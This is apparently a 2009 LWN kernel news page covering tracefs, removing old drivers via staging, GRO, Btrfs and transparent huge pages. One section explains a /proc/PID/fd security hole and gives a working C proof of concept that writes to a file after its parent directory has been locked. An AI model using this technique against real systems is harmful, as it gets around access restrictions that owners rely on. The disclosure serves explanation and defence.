The current development kernel remains 2.6.32-rc5; no 2.6.32 prepatches have been released over the last week.
The current stable kernel is 2.6.31.5, released (along with 2.6.27.38) on October 22.
The 2.6.27 update is relatively small and focused on SCSI and USB serial
devices; the 2.6.31 update, instead, addresses a much wider range of problems.
Comments (none posted)
It would be possible for us to rescan the RMRR tables when we take
a device out of the si_domain, if we _really_ have to. But I'm
going to want a strand of hair from the engineer responsible for
that design, for my voodoo doll.
-- David Woodhouse
If a software system is so complex that its quirks and pitfalls
cannot easily be located and avoided (witness the ondemand
scheduler problem on Pentium IV's message I recently filed) then
it is not *effectively* open source. I am qualified to read
hardware manuals, I am qualified to rewrite C code (having written
code generators for several C compilers) but the LKML is like the
windmill and I feel like Don Quixote tilting back and forth in
front of it. One could even argue that the lack of an open bug
reporting system (and "current state" online reports) effectively
makes Linux a non-open-source system. Should not Linux be one
of the first systems to make all knowledge completely available?
Or is it doomed to be replaced by systems which might provide such
capabilities (Android perhaps???)
-- Robert Bradbury
A real git tree will contain fixes for brown paperbag bugs, it will
contain reverts, it will contain the occasional messy changelog. It
is also, because it's more real life, far more trustable to pull
from. The thing is, nothing improves a workflow more than public
embarrassment - but rebasing takes away much of that public embarrassment.
-- Ingo Molnar
Comments (3 posted)
The release of Windows 7 happened to coincide with the Japan Linux Symposium in Tokyo. Linus Torvalds was clearly quite impressed - and Chris Schlaeger was there to capture the moment. The original picture is available over here.
See also: Len Brown's photos from the kernel summit and JLS.
Comments (20 posted)
In-kernel tracing is rapidly becoming a feature that developers and users
count on. In current kernels, though, the virtual files used to control
tracing and access data are all found in the debugfs filesystem, in the
.../debug/tracing directory. That is not seen as a long-term solution;
debugfs is meant for volatile, debugging information, but tracing users
want to see a stable ABI in a non-debugging location.
Following up on some conference discussions, Greg Kroah-Hartman decided to
regularize the tracing file hierarchy through the creation of a new tracefs virtual filesystem.
Tracefs looks a lot like .../debug/tracing in that the files have
simply been moved from one location to the other. Tracefs has a simpler
internal API, though, since it does not require all of the features
supported by debugfs.
The idea of tracefs is universally supported, but this particular patch
looks like it will not be going in anytime soon. The concern is that
anything moved out of debugfs and into something more stable will instantly
become part of the kernel ABI. Much of the current tracing interface has
been thrown together to meet immediate needs; the sort of longer-term
thinking which is needed to define an interface which can remain stable for
years is just beginning to happen.
Ingo Molnar thinks that the virtual files
which describe the available events could be exported now, but not much
else. That leaves most of the interface in an unstable state, still. So
Greg has withdrawn the patch for now;
expect it to come back when the tracing developers are more ready to commit
to their ABI. At that point, we can expect the debate to begin on the
truly important question of where tracefs should be mounted: /tracing, or elsewhere.
Comments (1 posted)
The staging tree was conceived as a way for substandard drivers to get into
the kernel tree. Recently, though, there has been talk of using staging to
ease drivers out as well. The idea is that apparently unused and unloved
drivers would be moved to the staging tree, where they will languish for
three development cycles. If nobody has stepped up to maintain those
drivers during that time, they will be removed from the tree. This idea
was discussed at the 2009 Kernel Summit with no serious dissent.
Since then, John Linville has decided to test the system with a series of
ancient wireless drivers. These include the "strip" driver ("STRIP
is a radio protocol developed for the MosquitoNet project - to send
Internet traffic using Metricom radios."), along with the arlan,
netwave, and wavelan drivers. Nobody seems to care about this code, and it
is unlikely that any users remain. If that is true, then there should be
no down side to removing the code.
That hasn't stopped the complaints, though, mostly from people who believe
that staging drivers out of the tree is an abuse of the process which may
hurt unsuspecting users. It is true that users may have a hard time
noticing this change until the drivers are actually gone - though their
distributors may drop them before the mainline does. So the potential for
an unpleasant surprise is there; mistaken removals are easily reverted, but
that is only partially comforting for a user whose system has just broken.
The problem here is that there is no other way to get old code out of the
tree. Once upon a time, API changes would cause unmaintained code to fail
to compile; after an extended period of brokenness, a driver could be
safely removed. Contemporary mores require developers to fix all in-tree
users of an API they change, though, so this particular indicator no longer
exists. That means the tree can fill up with code which is unused and
which has long since ceased to work, but which still compiles flawlessly.
Somehow a way needs to be found to remove that code. The "staging out"
process may not be perfect, but nobody has posted a better idea yet.
Comments (16 posted)
In a discussion of the O_NODE
open flag patch, an interesting, though obscure, security hole came to
light. Jamie Lokier noticed the problem,
and Pavel Machek eventually posted it to the
Bugtraq security mailing list.
Normally, one would expect that a file in a
directory with 700 permissions would be inaccessible to all but the owner of
the directory (and root, of course). Lokier and Machek showed that there
is a way around that restriction by using an entry in an attacking process's
fd directory in the /proc filesystem.
If the directory
is open to the attacker at some time, while the file is present, the
attacker can open the file for reading and hold it open even if the victim
later changes the directory permissions. Any normal write to the open file descriptor will
fail because it was opened read-only, but writing to
/proc/$$/fd/N, where N is the open file
descriptor number, will succeed based on the permissions of the
file. If the file allows the attacking process to write to it,
writing to the /proc file will succeed regardless of the
permissions of the parent directory.
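The sequence can be demonstrated with ordinary system calls. The sketch below uses made-up file names and plays both victim and attacker in a single process for brevity; mode 0000 on the directory stands in for the real two-user scenario, since it blocks even the owner from traversing the path:

```c
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns 1 if a write through /proc/self/fd succeeds even after the
 * parent directory has been locked down.  Illustrative only: in a real
 * attack the victim and attacker are different users; here one process
 * plays both roles, and the names are invented for the demo. */
static int proc_fd_write_bypass(void)
{
    mkdir("holedemo", 0755);
    int fd = open("holedemo/f", O_CREAT | O_RDONLY, 0666);
    if (fd < 0)
        return -1;
    /* The "attacker" now holds fd, opened read-only while the
     * directory was still accessible. */

    chmod("holedemo", 0000);          /* the "victim" locks the directory */

    int bypass = 0;
    if (write(fd, "x", 1) < 0) {      /* read-only fd: direct write fails */
        char path[64];
        snprintf(path, sizeof(path), "/proc/self/fd/%d", fd);
        /* Reopening via /proc is checked against the file's own
         * permissions, not the (now-closed) directory's. */
        int wfd = open(path, O_WRONLY);
        if (wfd >= 0) {
            bypass = (write(wfd, "gotcha", 6) == 6);
            close(wfd);
        }
    }
    /* clean up */
    chmod("holedemo", 0700);
    unlink("holedemo/f");
    rmdir("holedemo");
    close(fd);
    return bypass;
}
```

The key observation is in the reopen step: /proc's fd entries are "magic" symlinks resolved directly to the inode, so the directory's permission bits are never consulted.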
This is rather counter-intuitive, and,
even though it is a rather contrived example, seems to constitute a
security hole.
The Bugtraq thread got off course quickly, by noting that a similar effect
could be achieved by creating a hardlink to the file before the directory
permissions were changed. While that is true, Machek's example looked for
that case by checking the link count on the file after the directory
permissions had been changed. The hardlink scenario would be detected at that
point.
One can imagine situations where programs do not put the right permissions
on the files they use and administrators attempt to work around that
problem by restricting access to the parent directory. Using this
technique, an attacker could still access those files, in a way that was
difficult to detect. As Machek noted, unmounting the /proc
filesystem removes the problem, but "I do not think mounting /proc
should change access control semantics."
There is currently some discussion of how,
and to some extent whether, to address the problem, but a consensus (and
patch) has not yet emerged.
Comments (12 posted)
Kernel development news
Your editor still remembers installing his first Ethernet adapter. Through
the expenditure of massive engineering resources, DEC was able to squeeze
this device onto a linked pair of UNIBUS boards - the better part of a
square meter of board space in total - so that a VAX system could be put
onto a modern network. Supporting 10Mb/sec was a bit of a challenge in
those days. In the intervening years, leading-edge network adaptors have
sped up to 10Gb/sec - a full three orders of magnitude. Supporting them is
a challenge, though for different reasons. At the 2009 Japan
Linux Symposium, Herbert Xu discussed those challenges and how Linux has
evolved to meet them.
Part of the problem is that 10G Ethernet is still Ethernet underneath.
There is value in that; it minimizes the changes required in other parts of
the system. But it's an old technology which brings some heavy baggage
with it, with the heaviest bag of all being the 1500-byte maximum transfer
unit (MTU) limit. With packet size capped at 1500 bytes, a 10G network
link running at full speed will be transferring over 800,000 packets per
second. Again, that's an increase of three orders of magnitude from the
10Mb days, but CPUs have not kept pace. So the amount of CPU time
available to process a single Ethernet packet is less than it was in the
early days. Needless to say, that is putting some pressure on the
networking subsystem; the amount of CPU time required to process each
packet must be squeezed wherever possible.
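The 800,000 figure follows from simple arithmetic; a quick sketch (numbers only, ignoring Ethernet framing overhead, which would push the packet count slightly higher still):

```c
/* Back-of-the-envelope packet rate: line rate divided by the
 * per-packet payload limit. */
static double packets_per_second(double link_gbits, int mtu_bytes)
{
    return (link_gbits * 1e9) / (mtu_bytes * 8.0);
}
/* packets_per_second(10, 1500) is roughly 833,000 packets/second,
 * matching the "over 800,000" figure in the text. */
```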
(Some may quibble that, while individual CPU speeds have not kept pace, the
number of cores has grown to make up the difference. That is true, but the
focus of Herbert's talk was single-CPU performance for a couple of reasons:
any performance work must benefit uniprocessor systems, and distributing a
single adapter's work across multiple CPUs has its own challenges.)
Given the importance of per-packet overhead, one might well ask whether it
makes sense to raise the MTU. That can be done; the "jumbo frames"
mechanism can handle packets up to 9KB in size. The problem, according to
Herbert, is that "the Internet happened." Most connections of interest go
across the Internet, and those are all bound by the lowest MTU in the
entire path. Sometimes that MTU is even less than 1500 bytes.
Protocol-based mechanisms for finding out what that MTU is exist, but they
don't work well on the Internet; in particular, a lot of firewall setups
break it. So, while jumbo frames might work well for local networks, the
sad fact is that we're stuck with 1500 bytes on the wider Internet.
If we can't use a larger MTU, we can go for the next-best thing: pretend
that we're using a larger MTU. For a few years now Linux has supported
network adapters which perform "TCP segmentation offload," or TSO. With a
TSO-capable adapter, the kernel can prepare much larger packets (64KB, say)
for outgoing data; the adapter will then re-segment the data into smaller
packets as the data hits the wire. That cuts the kernel's per-packet
overhead by a factor of 40. TSO is well supported in Linux; for systems
which are engaged mainly in the sending of data, it's sufficient to make
a 10G link run at full speed.
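The factor-of-40 figure is simply the ratio of the super-packet size to the MTU; as a sketch (the 64KB size is the example from the text):

```c
/* With TSO the kernel hands the adapter one large super-packet instead
 * of MTU-sized packets; per-packet work in the kernel drops by roughly
 * this ratio. */
static int tso_segments(int super_packet_bytes, int mtu_bytes)
{
    return super_packet_bytes / mtu_bytes;   /* 65536 / 1500 is ~43 */
}
```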
The kernel actually has a generic segmentation offload mechanism (called
GSO) which is not limited to TCP. It turns out that performance improves
even if the feature is emulated in the driver. But GSO only works for data
transmission, not reception. That limitation is entirely fine for broad
classes of users; sites providing content to the net, for example, send far
more data than they receive. But other sites have different workloads,
and, for them, packet reception overhead is just as important as
transmission overhead.
Solutions on the receive side have been a little slower in coming, and not
just because the first users were more interested in transmission
performance. Optimizing the receive side is harder because packet
reception is, in general, harder. When it is transmitting data, the kernel
is in complete control and able to throttle sending processes if
necessary. But incoming packets are entirely asynchronous events, under
somebody else's control, and the kernel just has to cope with what it gets.
Still, a solution has emerged in the form of "large receive offload" (LRO),
which takes a very similar approach: incoming packets are merged at
reception time so that the operating system sees far fewer of them. This
merging can be done either in the driver or in the hardware; even LRO
emulation in the driver has performance benefits. LRO is widely supported
by 10G drivers under Linux.
But LRO is a bit of a flawed solution, according to Herbert; the real
problem is that it "merges everything in sight." This transformation is
lossy; if there are important differences between the headers in incoming
packets, those differences will be lost. And that breaks things. If a
system is serving as a router, it really should not be changing the headers
on packets as they pass through. LRO can totally break satellite-based
connections, where some very strange header tricks are done by providers to
make the whole thing work. And bridging breaks, which is a serious
problem: most virtualization setups use a virtual network bridge between
the host and its clients. One might simply avoid using LRO in such
situations, but these also tend to be the workloads that one really wants
to optimize. Virtualized networking, in particular, is already slower; any
possible optimization in this area is much needed.
The solution is generic receive offload (GRO).
In GRO, the criteria for which packets can be merged are greatly
restricted; the MAC headers must be identical and only a few TCP or IP
headers can differ. In fact, the set of headers which can differ is
severely restricted: checksums are necessarily different, and the IP ID
field is allowed to increment. Even the TCP timestamps must be identical,
which is less of a restriction than it may seem; the timestamp is a
relatively low-resolution field, so it's not uncommon for lots of packets
to have the same timestamp. As a result of these restrictions, merged
packets can be resegmented losslessly; as an added benefit, the GSO code
can be used to perform resegmentation.
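A simplified, hypothetical version of such a merge check might look like the following. The struct and field names are invented for illustration; the real kernel code operates on sk_buff structures and applies many more conditions:

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

/* Invented, simplified per-packet header state for illustration. */
struct pkt_hdrs {
    uint8_t  mac[14];       /* Ethernet header bytes */
    uint16_t ip_id;         /* IP identification field */
    uint32_t tcp_tsval;     /* TCP timestamp value */
    uint32_t seq;           /* TCP sequence number */
    uint16_t payload_len;   /* TCP payload bytes in this packet */
};

/* Can 'next' be merged onto 'held', per the restrictions described in
 * the article?  (A sketch, not the kernel's actual implementation.) */
static bool gro_can_merge(const struct pkt_hdrs *held,
                          const struct pkt_hdrs *next)
{
    if (memcmp(held->mac, next->mac, sizeof(held->mac)) != 0)
        return false;                  /* MAC headers must be identical */
    if (next->ip_id != (uint16_t)(held->ip_id + 1))
        return false;                  /* IP ID may only increment */
    if (next->tcp_tsval != held->tcp_tsval)
        return false;                  /* TCP timestamps must match */
    if (next->seq != held->seq + held->payload_len)
        return false;                  /* data must be exactly in sequence */
    return true;                       /* (checksums are recomputed) */
}
```

Because every condition above is reversible, a merged packet can later be split back into packets identical to the originals, which is what makes GRO lossless where LRO is not.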
One other nice thing about GRO is that, unlike LRO, it is not limited to
TCP/IPv4.
The GRO code was merged for 2.6.29, and it is supported by a number of 10G
drivers. The conversion of drivers to GRO is quite simple. The biggest
problem, perhaps, is with new drivers which are written to use the LRO API
instead. To head this off, the LRO API may eventually be removed, once the
networking developers are convinced that GRO is fully functional with no
remaining performance regressions.
In response to questions, Herbert said that there has not been a lot of
effort toward using LRO in 1G drivers. In general, current CPUs can keep
up with a 1G data stream without too much trouble. There might be a
benefit, though, in embedded systems which typically have slower
processors. How does the kernel decide how long to wait for incoming
packets before merging them? It turns out that there is no real need for
any special waiting code: the NAPI API already has the driver polling for
new packets occasionally and processing them in batches. GRO can simply be
performed at NAPI poll time.
The next step may be toward "generic flow-based merging"; it may also be
possible to start merging unrelated packets headed to the same destination
to make larger routing units. UDP merging is on the list of things to do.
There may even be a benefit in merging TCP ACK packets. Those packets are
small, but there are a lot of them - typically one for every two data
packets going the other direction. This technology may go in surprising
directions, but one thing is clear: the networking developers are not short
of ideas for enabling Linux to keep up with ever-faster hardware.
Comments (23 posted)
Conferences can be a good opportunity to catch up with the state of ongoing
projects. Even a detailed reading of the relevant mailing lists will not
always shed light on what the developers are planning to do next, but a
public presentation can inspire them to set out what they have in mind.
Chris Mason's Btrfs talk at the Japan Linux Symposium was a good example of
such a talk.
The Btrfs filesystem was merged for the 2.6.29 kernel, mostly as a way to encourage wider
testing and development. It is certainly not meant for production use at
this time. That said, there are people doing serious work on top of Btrfs;
it is getting to where it is stable enough for daring users. Current Btrfs
includes an all-caps warning in the Kconfig file stating that the
disk format has not yet been stabilized; Chris is planning to remove that
warning, perhaps for the 2.6.33 release. Btrfs, in other words, is
maturing.
One relatively recent addition is full use of zlib compression. Online
resizing and defragmentation are coming along nicely. There has also been
some work aimed at making synchronous I/O operations work well.
Defragmentation in Btrfs is easy: any specific file can be defragmented by
simply reading it and writing it back. Since Btrfs is a copy-on-write
filesystem, this rewrite will create a new copy of the file's data which
will be as contiguous as the filesystem is able to make it. This approach
can also be used to control the layout of files on the filesystem. As an
experiment, Chris took a bunch of boot-tracing data from a Moblin system
and analyzed it to figure out which files were accessed, and in which
order. He then rewrote the files in question to put them all in the same
part of the disk. The result was a halving of the I/O time during boot,
resulting in a faster system initialization and smiles all around.
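The rewrite trick described above needs nothing more than ordinary file I/O; a minimal sketch follows. It is not crash-safe (a careful tool would write to a temporary file first, or use a filesystem-provided interface):

```c
#include <stdio.h>
#include <stdlib.h>

/* "Defragment" a file on a copy-on-write filesystem by reading it and
 * writing it back; on Btrfs the rewrite allocates a fresh, more
 * contiguous copy of the data.  Sketch only: not crash-safe. */
static int rewrite_in_place(const char *path)
{
    FILE *f = fopen(path, "rb");
    if (!f)
        return -1;
    fseek(f, 0, SEEK_END);
    long len = ftell(f);
    rewind(f);
    char *buf = malloc(len > 0 ? len : 1);
    if (!buf || fread(buf, 1, len, f) != (size_t)len) {
        fclose(f);
        free(buf);
        return -1;
    }
    fclose(f);

    f = fopen(path, "wb");            /* truncate, then write fresh data */
    if (!f) {
        free(buf);
        return -1;
    }
    size_t written = fwrite(buf, 1, len, f);
    fclose(f);
    free(buf);
    return written == (size_t)len ? 0 : -1;
}
```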
Performance of synchronous operations has been an important issue over the
last year. On filesystems like ext3, an fsync() call will flush
out a lot of data which is not related to the actual file involved; that
adds a significant performance penalty for fsync() use and
discourages careful programming. Btrfs has improved the situation by
creating an entirely separate Btree on each filesystem which is used for
synchronous I/O operations. That tree is managed identically to, but
separately from, the regular filesystem tree. When an fsync()
call comes along, Btrfs can use this tree to only force out operations for
the specific file involved. That gives a major performance win over ext3.
A further improvement would be the ability to write a set of files, then
flush them all out in a single operation. Btrfs could do that, but there's no way in
POSIX to tell the kernel to flush multiple files at once. Fixing that is
likely to involve a new system call.
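Today, each file must be made durable with its own fsync() call; that per-file pattern, sketched below, is exactly what a batched flush call would collapse into one operation:

```c
#include <fcntl.h>
#include <stddef.h>
#include <unistd.h>

/* Write a buffer to a file and force it to stable storage.  POSIX has
 * no "flush this set of files" call, so writing N files durably means
 * N separate fsync() calls, each paying the full flush cost. */
static int write_durably(const char *path, const void *buf, size_t len)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, buf, len);
    if (n != (ssize_t)len || fsync(fd) != 0) {
        close(fd);
        return -1;
    }
    return close(fd);
}
```

On ext3 each of those fsync() calls can drag unrelated dirty data to disk with it; Btrfs's separate log tree limits the flush to the file actually involved.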
Btrfs provides a number of features which are also available via the device
mapper and MD subsystems; some people have wondered if this duplication of
features makes sense. But there are some good reasons for it; Chris gave a
couple of examples:
- Doing snapshots at the device mapper/LVM layer involves making a lot
more copies of the relevant data. Chris ran an experiment where he
created a 400MB file, created a bunch of snapshots, then overwrote the
file. Btrfs is able to just write the new version, while allowing all
of the snapshots to share the old copy. LVM, instead, copies the data
once for each snapshot. So this test, which ran in less than two
seconds on Btrfs, took about ten minutes with LVM.
- Anybody who has had to replace a drive in a RAID array knows that the
rebuild process can be long and painful. While all of that data is
being copied, the array runs slowly and does not provide the usual
protections. The advantage of running RAID within Btrfs is that the
filesystem knows which blocks contain useful data and which do not.
So, while an MD-based RAID array must copy an entire drive's worth of
data, Btrfs can get by without copying unused blocks.
So what does the future hold? Chris says that the 2.6.32 kernel will
include a version of Btrfs which is stable enough for early adopters to
play with. In 2.6.33, with any luck, the filesystem will have RAID4 and
RAID5 support. Things will then stabilize further for 2.6.34. Chris was
typically cagey when talking about production use, though, pointing out
that it always takes a number of years to develop complete confidence in a
new filesystem. So, while those of us with curiosity, courage, and good
backups could maybe be making regular use of Btrfs within a year,
widespread adoption is likely to be rather farther away than that.
Comments (54 posted)
Most Linux systems divide memory into 4096-byte pages; for the bulk of the
memory management code, that is the smallest unit of memory which can be
manipulated. 4KB is an increase over what early virtual memory systems
used; 512 bytes was once common. But it is still small relative to both
the amount of physical memory available on contemporary systems and
the working set size of applications running on those systems. That means
that the operating system has more pages to manage than it did some years
ago.
Most current processors can work with pages larger than 4KB. There are
advantages to using larger pages: the size of page tables decreases, as
does the number of page faults required to get an application into RAM.
There is also a significant performance advantage that derives from the
fact that large pages require fewer translation lookaside buffer (TLB)
slots. These slots are a highly contended resource on most systems;
reducing TLB misses can improve performance considerably for a number of
applications.
There are also disadvantages to using larger pages. The amount of wasted
memory will increase as a result of internal fragmentation; extra data
dragged around with sparsely-accessed memory can also be costly. Larger
pages take longer to transfer from secondary storage, increasing page fault
latency (while decreasing page fault counts). The time required to simply
clear very large pages can create significant kernel latencies. For all of
these reasons, operating systems have generally stuck to smaller pages.
Besides, having a single, small page size simply works and has the benefit
of many years of experience.
There are exceptions, though. The mapping of kernel virtual memory is done
with huge pages. And, for user space, there is "hugetlbfs," which can be
used to create and use large pages for anonymous data. Hugetlbfs was added
to satisfy an immediate need felt by large database management systems,
which use large memory arrays. It is narrowly aimed at a small number of
use cases, and comes with significant limitations: huge pages must be
reserved ahead of time, cannot transparently fall back to smaller pages,
are locked into memory, and must be set up via a special API. That worked
well as long as the only user was a certain proprietary database manager.
But there is increasing interest in using large pages elsewhere;
virtualization, in particular, seems to be creating a new set of demands
for this feature.
A host setting up memory ranges for virtualized guests would like to be
able to use large pages for that purpose. But if large pages are not
available, the system should simply fall back to using lots of smaller
pages. It should be possible to swap large pages when needed. And the
virtualized guest should not need to know anything about the use of large
pages by the host. In other words, it would be nice if the Linux memory
management code handled large pages just like normal pages. But that is
not how things happen now; hugetlbfs is, for all practical purposes, a
separate, parallel memory management subsystem.
Andrea Arcangeli has posted a
transparent hugepage patch which attempts to remedy this situation by
removing the disconnect between large pages and the regular Linux virtual
memory subsystem. His goals are fairly ambitious: he would like an
application to be able to request large pages with a simple
madvise() system call. If large pages are available, the system
will provide them to the application in response to page faults; if not,
smaller pages will be used.
Beyond that, the patch makes large pages swappable. That is not as easy as
it sounds; the swap subsystem is not currently able to deal with memory in
anything other than PAGE_SIZE units. So swapping out a large page
requires splitting it into its component parts first. This feature works,
but not everybody agrees that it's worthwhile. Christoph Lameter commented that workloads which are
performance-sensitive go out of their way to avoid swapping anyway, but
that may become less true on a host filling up with virtualized guests.
A future feature is transparent reassembly of large pages. If such a page
has been split (or simply could not be allocated in the first place), the
application will have a number of smaller pages scattered in memory.
Should a large page become available, it would be nice if the memory
management code would notice and migrate those small pages into one large
page. This could, potentially, even happen for applications which have
never requested large pages at all; the kernel would just provide them by
default whenever it seemed to make sense. That would make large pages
truly transparent and, perhaps, decrease system memory fragmentation at the
same time.
This is an ambitious patch to the core of the Linux kernel, so it is
perhaps amusing that the chief complaint seems to be that it does not go
far enough. Modern x86 processors can support a number of page sizes, up
to a massive 1GB. Andrea's patch is currently aiming for the use of 2MB
pages, though - quite a bit smaller. The reasoning is simple: 1GB pages
are an unwieldy unit of memory to work with. No Linux system that has been
running for any period of time will have that much contiguous memory lying
around, and the latency involved with operations like clearing pages would
be severe. But Andi Kleen thinks this approach
is short-sighted; today's massive chunk of memory is tomorrow's brief
email. Andi would rather that the system not be designed around today's
limitations; for the moment, no agreement has been reached on that point.
In any case, this patch is an early RFC; it's not headed toward the
mainline in the near future. It's clearly something that Linux needs,
though; making full use of the processor's capabilities requires treating
large pages as first-class memory-management objects. Eventually we should
all be using large pages - though we may not know it.
Comments (12 posted)
Patches and updates
Core kernel code
- Greg KH: tracefs (October 23, 2009)
Filesystems and block I/O
Virtualization and containers
Page editor: Jonathan Corbet